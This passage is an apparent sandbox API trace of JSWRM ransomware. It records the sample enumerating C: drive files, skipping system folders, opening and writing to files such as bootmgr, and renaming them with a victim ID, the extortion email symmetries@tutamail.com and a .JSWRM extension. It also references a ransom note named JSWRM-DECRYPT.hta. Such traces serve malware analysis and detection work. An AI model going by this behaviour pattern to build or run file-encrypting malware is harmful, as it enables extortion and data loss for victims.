ftCreationTime.dwLowDateTime=0x1d186442, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d186442, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d1d25ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.513] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.514] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.514] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.514] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.514] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234338328) returned 0 [0064.514] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.514] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.515] CloseHandle (hObject=0xffffffff) returned 1 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0064.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226130 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0064.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226130 | out: hHeap=0x1e0000) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.515] MoveFileW (lpExistingFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\zh-TW\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.515] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.515] FindClose (in: hFindFile=0x231fc0 | out: hFindFile=0x231fc0) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.515] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0064.516] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0064.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0064.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0064.517] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="...") returned 1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="recovery") returned -1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="perflogs") returned -1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="documents and settings") returned -1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="$RECYCLE.BIN") returned 1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="system volume information") returned -1 [0064.517] lstrcmpiW (lpString1="bootmgr", lpString2="msocache") returned -1 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr", cchWideChar=7, lpMultiByteStr=0x345fce0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr", lpUsedDefaultChar=0x0) returned 7 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr", cchWideChar=7, lpMultiByteStr=0x345fcb0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr", lpUsedDefaultChar=0x0) returned 7 [0064.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0064.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.517] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.518] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=10150244673393456) returned 0 [0064.518] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.519] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 0 [0064.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.519] CloseHandle (hObject=0xffffffff) returned 1 [0064.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0064.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x68) returned 0x2358e8 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a) returned 0x2196c0 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2358e8 | out: hHeap=0x1e0000) returned 1 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.520] MoveFileW (lpExistingFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\bootmgr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\bootmgr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0064.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.521] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0064.521] lstrcmpiW (lpString1="BOOTNXT", lpString2=".") returned 1 [0064.521] lstrcmpiW (lpString1="BOOTNXT", lpString2="..") returned 1 [0064.521] lstrcmpiW (lpString1="BOOTNXT", lpString2="...") returned 1 [0064.523] lstrcmpiW (lpString1="BOOTNXT", lpString2="windows") returned -1 [0064.523] lstrcmpiW (lpString1="BOOTNXT", lpString2="recovery") returned -1 [0064.523] lstrcmpiW (lpString1="BOOTNXT", lpString2="perflogs") returned -1 [0064.524] lstrcmpiW (lpString1="BOOTNXT", lpString2="documents and settings") returned -1 [0064.524] lstrcmpiW (lpString1="BOOTNXT", lpString2="$RECYCLE.BIN") returned 1 [0064.524] lstrcmpiW (lpString1="BOOTNXT", lpString2="system volume information") returned -1 [0064.524] lstrcmpiW (lpString1="BOOTNXT", lpString2="msocache") returned -1 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTNXT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTNXT", cchWideChar=7, lpMultiByteStr=0x345fce0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTNXT", lpUsedDefaultChar=0x0) returned 7 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTNXT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTNXT", cchWideChar=7, lpMultiByteStr=0x345fcb0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTNXT", lpUsedDefaultChar=0x0) returned 7 [0064.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.524] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0064.525] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=1) returned 1 [0064.525] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23ba58 [0064.525] ReadFile (in: hFile=0x44c, lpBuffer=0x23ba58, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x23ba58*, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 1 [0064.525] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.525] WriteFile (in: hFile=0x44c, lpBuffer=0x23ba58*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345f9a0, lpOverlapped=0x0 | out: lpBuffer=0x23ba58*, lpNumberOfBytesWritten=0x345f9a0*=0x0, lpOverlapped=0x0) returned 1 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ba58 | out: hHeap=0x1e0000) returned 1 [0064.526] CloseHandle (hObject=0x44c) returned 1 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: 